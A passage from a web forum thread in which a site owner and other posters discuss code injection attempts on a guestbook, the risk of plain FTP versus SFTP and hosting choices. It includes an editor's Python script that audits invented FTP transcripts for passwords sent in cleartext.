    Code injection vulnerabilities are not easy to trace down. There could be a number of ways that such vulnerabilities can come about, many of which you ruled out. It is futile to speculate whether malware on your PC is the culprit or not. If you are in the Web business, you need to have SFTP, period. If your host does not allow it (it is beyond me why not), change it. Switch to another hosting company that allows only secure FTP. Even that does not guarantee anything, but it could point the finger of blame in only one direction.
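    The point about plain FTP is that the login travels across the network in cleartext, so anyone on the path, or a compromised machine on the same network, can read it. The script below is an editor's example added to this thread, not code from the thread or from any FTP client or server. It replays three constructed FTP control-channel transcripts (the username and password are invented) and reports whether the PASS command was sent before a TLS session had been negotiated with AUTH TLS. The third transcript shows the case that matters on a host that refuses FTPS: a client set to use TLS only if available falls back to plaintext and the password goes out in the clear anyway, which is why changing the password straight after a plain-FTP session is the right instinct.

```python
"""Audit FTP control-channel transcripts for cleartext credentials.

Editor's example: the transcripts below are constructed, not captured from
any real session; the username and password are invented.
"""

# Each entry is (direction, line): "C" = client -> server, "S" = server -> client.
PLAIN_FTP = [
    ("S", "220 FTP server ready"),
    ("C", "USER techno"),
    ("S", "331 Password required for techno"),
    ("C", "PASS Tr0ub4dor&3"),
    ("S", "230 User techno logged in"),
    ("C", "CWD /public_html/guestbook"),
    ("S", "250 CWD command successful"),
]

# Explicit FTPS: AUTH TLS is accepted (234), after which every line on the
# control channel is a TLS record. Shown here as opaque placeholders, since a
# packet capture would contain only ciphertext.
EXPLICIT_FTPS = [
    ("S", "220 FTP server ready"),
    ("C", "AUTH TLS"),
    ("S", "234 AUTH TLS successful"),
    ("C", "<TLS application data, 53 bytes>"),
    ("S", "<TLS application data, 42 bytes>"),
]

# A host that does not support FTPS: AUTH TLS is rejected, and a client
# configured to use TLS only "if available" falls back to a plaintext login.
FTPS_REFUSED_FALLBACK = [
    ("S", "220 FTP server ready"),
    ("C", "AUTH TLS"),
    ("S", "500 AUTH not understood"),
    ("C", "USER techno"),
    ("S", "331 Password required for techno"),
    ("C", "PASS Tr0ub4dor&3"),
    ("S", "230 User techno logged in"),
]


def audit_ftp_session(session) -> dict:
    """Replay a control-channel transcript and report any cleartext login.

    Returns a dict with:
      tls_negotiated      - True once the server accepted AUTH TLS/SSL (reply 234)
      exposed_credentials - (user, password) if PASS was sent before TLS was
                            negotiated, otherwise None
    """
    tls_negotiated = False
    auth_pending = False   # AUTH TLS sent, waiting for the server's verdict
    user = None
    exposed = None

    for direction, line in session:
        code, _, arg = line.partition(" ")
        if direction == "C":
            verb = code.upper()
            if verb == "AUTH" and arg.upper() in ("TLS", "SSL"):
                auth_pending = True
            elif verb == "USER":
                user = arg
            elif verb == "PASS" and not tls_negotiated and exposed is None:
                # The password is on the wire unprotected; record the first such login.
                exposed = (user, arg)
        elif auth_pending and code[:3].isdigit():
            # 234 means the server accepted TLS; a 4xx/5xx reply means it refused,
            # so the session stays in plaintext and a fallback login is exposed.
            if code.startswith("234"):
                tls_negotiated = True
            auth_pending = False

    return {"tls_negotiated": tls_negotiated, "exposed_credentials": exposed}


if __name__ == "__main__":
    for name, session in [("plain FTP", PLAIN_FTP),
                          ("explicit FTPS", EXPLICIT_FTPS),
                          ("FTPS refused, fallback", FTPS_REFUSED_FALLBACK)]:
        result = audit_ftp_session(session)
        print(f"{name:24s} tls={str(result['tls_negotiated']):5s} "
              f"exposed={result['exposed_credentials']}")
```

    The same check applies to a real capture: export the FTP control stream (port 21 by default) as text, tag each line with its direction, and feed it in. SFTP is not an FTP session at all but a subsystem of SSH, so there is no cleartext phase to audit; the login happens only after the SSH key exchange has encrypted the connection.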

  20. #20 TechnoBear ("Life is not a malfunction"; Argyll, Scotland; joined Jun 2011; 6,205 posts)
    Quote Originally Posted by rageh View Post
    If you are in the Web business, you need to have SFTP, period. If your host does not allow it (it is beyond me why not), change it. Switch to another hosting company that allows only secure FTP. Even that does not guarantee anything, but it could point the finger of blame in only one direction.
    I also can't understand why they won't allow secure FTP. I have already moved some sites to another host, but I can't afford to move them all at once. I've found several hosting companies that allow secure FTP, but none that only allow secure FTP.

    All my sites are very small, which is why they're on shared hosting. This one has fewer than 200 visitors per month.

  21. #21 Stormrider (SitePoint Wizard; Nottingham, UK; joined Sep 2006; 3,133 posts)
    I use a VPS - then I can set up and/or install whatever I want on there. I rarely use FTP now anyway; I'm usually logging in via SSH and rolling things out from SVN directly.

  22. #22 TechnoBear ("Life is not a malfunction"; Argyll, Scotland; joined Jun 2011; 6,205 posts)
    Yes - I've already decided that a VPS is the way to go in future. In the meantime, I'm stuck with what I've got for some of these sites and I'm pretty nervous of anything that seems odd. Hence my concern with this site, which has now been hit by over 100 of these attempts, while my other sites have been untouched over the same period. The only thing I've done differently with this site was access it (once, very briefly) by FTP.

  23. #23 cluongo (SitePoint Enthusiast; Atlanta; joined Jun 2011; 71 posts)
    More than likely, as mentioned above, people use dorks to find vulnerable websites on Google very easily (seeing as how I'm sure that page got indexed with a big fat GUESTBOOK PLUGIN VERSION x1.0000 or whatever).

    Might be on a hack forum, as said above. Might be from a vulnerability scanner like Websecurify, or any combination of the above.

    I read through all the posts here but try removing the guestbook if you haven't already.

    Also, I noticed you said you used an FTP client to upload all the files for the guestbook (instead of the usual cPanel file manager), so which FTP program did you use and where did you download it from? (You didn't seem to answer the question when asked above, unless I'm blind, in which case I apologize!)

  24. #24 TechnoBear ("Life is not a malfunction"; Argyll, Scotland; joined Jun 2011; 6,205 posts)
    Quote Originally Posted by cluongo View Post
    More than likely, as mentioned above, people use dorks to find vulnerable websites on Google very easily (seeing as how I'm sure that page got indexed with a big fat GUESTBOOK PLUGIN VERSION x1.0000 or whatever).
    Mmmm - except it's disallowed in the robots.txt. I realise that won't keep out the bad bots, but it should keep it off Google.

    Quote Originally Posted by cluongo View Post
    I read through all the posts here but try removing the guestbook if you haven't already.
    Do you have any suggestions as to what I should replace it with that would be more secure? Sparek and Crazybanana both reckon the latest version is safe from known vulnerabilities and although there have been attempted hacks nothing has succeeded. As I keep saying, the other site I have which uses this guest book is unaffected, even though the guest book has been installed there slightly longer. There have also been no further attempts on this site in the last six days.
    Quote Originally Posted by cluongo View Post
    Also, I noticed you said you used an FTP client to upload all the files for the guestbook (instead of the usual cPanel file manager), so which FTP program did you use and where did you download it from? (You didn't seem to answer the question when asked above, unless I'm blind, in which case I apologize!)
    I used Filezilla. As I mentioned before, everything on my system is installed from the official distro repositories. I apologise for not answering the original question, but I thought the point of that question was whether or not I might be using a dodgy app., which I'm not.

